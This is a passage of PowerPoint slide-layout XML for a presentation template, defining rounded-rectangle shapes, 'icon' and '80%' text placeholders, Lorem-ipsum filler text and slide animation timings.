            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rounded Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10706103" y="4671937"/>
            <a:ext cx="1937455" cy="782954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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="52" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10787243" y="4717659"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="53" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584746" y="4671937"/>
            <a:ext cx="2777772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6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47" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="54" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252638" y="4981672"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="Group 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Rounded Rectangle 48"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 49"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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" name="Rounded Rectangle 50"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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3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3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3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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="3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4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4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4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3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3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3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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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4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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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3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3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3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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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4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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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3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3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3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4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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4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4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4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5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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3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3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3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5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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4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4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3" dur="4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6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12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3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3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9" dur="3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" grpId="0" animBg="1"/>
      <p:bldP spid="13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animBg="1"/>
      <p:bldP spid="29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3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animBg="1"/>
      <p:bldP spid="33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3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3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animBg="1"/>
      <p:bldP spid="37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3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3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 animBg="1"/>
      <p:bldP spid="41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4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4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 animBg="1"/>
      <p:bldP spid="45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4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4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ic lis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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644176" y="1638675"/>
            <a:ext cx="3030357" cy="782954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39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101380" y="1684396"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rounded Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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2" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="55" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918408" y="1827910"/>
            <a:ext cx="1581147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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38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603251" y="2588938"/>
            <a:ext cx="3071283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6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39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603256" y="2979949"/>
            <a:ext cx="3071281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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Rounded Rectangle 64"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548717" y="1638675"/>
            <a:ext cx="3071283" cy="782954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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046847" y="1684396"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="56" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818720" y="1827910"/>
            <a:ext cx="1581147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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="41" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548717" y="2588938"/>
            <a:ext cx="3071283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6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92" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548722" y="2979949"/>
            <a:ext cx="3071281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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Rounded Rectangle 109"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504768" y="1638675"/>
            <a:ext cx="3071283" cy="782954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1" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9002898" y="1684396"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="57" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9752193" y="1827910"/>
            <a:ext cx="1581147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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504768" y="2588938"/>
            <a:ext cx="3071283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6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114" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="45" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504773" y="2979949"/>
            <a:ext cx="3071281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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Rounded Rectangle 129"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644179" y="4066912"/>
            <a:ext cx="3030356" cy="782954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1" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="46" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101380" y="4112633"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="58" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918408" y="4254871"/>
            <a:ext cx="1581147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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="47" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="5017174"/>
            <a:ext cx="3071283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6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140" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="48" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603256" y="5428506"/>
            <a:ext cx="3071281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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Rounded Rectangle 144"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548720" y="4066912"/>
            <a:ext cx="3071280" cy="782954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6" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="49" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046847" y="4112633"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="59" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818720" y="4254871"/>
            <a:ext cx="1581147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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="50" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548717" y="5017174"/>
            <a:ext cx="3071283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6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152" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="51" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4548722" y="5428506"/>
            <a:ext cx="3071281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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Rounded Rectangle 154"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504771" y="4066912"/>
            <a:ext cx="3071280" cy="782954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6" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="52" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9002898" y="4112633"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="60" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9752193" y="4254871"/>
            <a:ext cx="1581147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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="53" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504768" y="5017174"/>
            <a:ext cx="3071283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6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159" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="54" hasCustomPrompt="1"/>
